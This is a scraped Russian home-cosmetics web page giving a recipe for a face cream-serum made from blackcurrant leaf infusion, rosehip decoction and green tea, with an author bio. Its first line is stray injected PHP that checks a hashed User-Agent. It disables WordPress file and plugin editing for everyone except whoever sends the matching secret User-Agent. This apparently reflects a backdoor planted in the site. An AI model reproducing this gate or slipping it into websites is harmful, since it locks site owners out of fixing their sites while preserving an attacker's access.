if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Как сделать нежный крем для лица с использованием смородины | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Как сделать нежный крем для лица с использованием смородины

Изготовление домашнего крема-сыворотки для лица поможет приготовить настоящее средство, которое подарит вашей коже нежность и упругость. Состав данного крема сыворотки с настоем листьев смородины очень прост и доступен любой даме

Изго­тов­ле­ние домаш­не­го кре­ма-сыво­рот­ки для лица помо­жет при­го­то­вить насто­я­щее сред­ство, кото­рое пода­рит вашей коже неж­ность и упру­гость. Состав дан­но­го кре­ма сыво­рот­ки с насто­ем листьев смо­ро­ди­ны очень прост и досту­пен любой даме.

Для приготовления вам необходимо взять:

  • листья чер­ной смородины;
  • шипов­ник (пло­ды 2 ст.л.);
  • чай зеле­ный (1 ч.л.)

Изготовление

Для при­го­тов­ле­ния, необ­хо­ди­мо хоро­шо вымы­тые листья чер­ной смо­ро­ди­ны залить кипят­ком и отста­вить на 1 час. В тече­ние это­го вре­ме­ни необ­хо­ди­мо пло­ды шипов­ни­ка залить водой и поста­вить на малень­кий огонь. Кипя­тить пло­ды необ­хо­ди­мо при­бли­зи­тель­но 5 минут, затем отста­вить на 1 час.

Для при­го­тов­ле­ния кре­ма-сыво­рот­ки необ­хо­ди­мо сме­шать зеле­ный чай, отвар шипов­ни­ка (1 ч.л.) и насто­ян­ную воду из листьев смо­ро­ди­ны (1ч.л.).

Применение

Для удоб­но­го нане­се­ния дан­но­го кре­ма на лицо, мож­но всю полу­чен­ную смесь соеди­нить с 50 мл люби­мо­го кре­ма. Эту мас­су необ­хо­ди­мо тща­тель­но пере­ме­щать. Таким обра­зом, при­го­тов­лен­ная кос­ме­ти­ка в домаш­них усло­ви­ях будет мак­си­маль­но полез­ной для ваше­го орга­низ­ма. Ее хра­нить мож­но в холо­диль­ни­ке на про­тя­же­ние 1 месяца.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!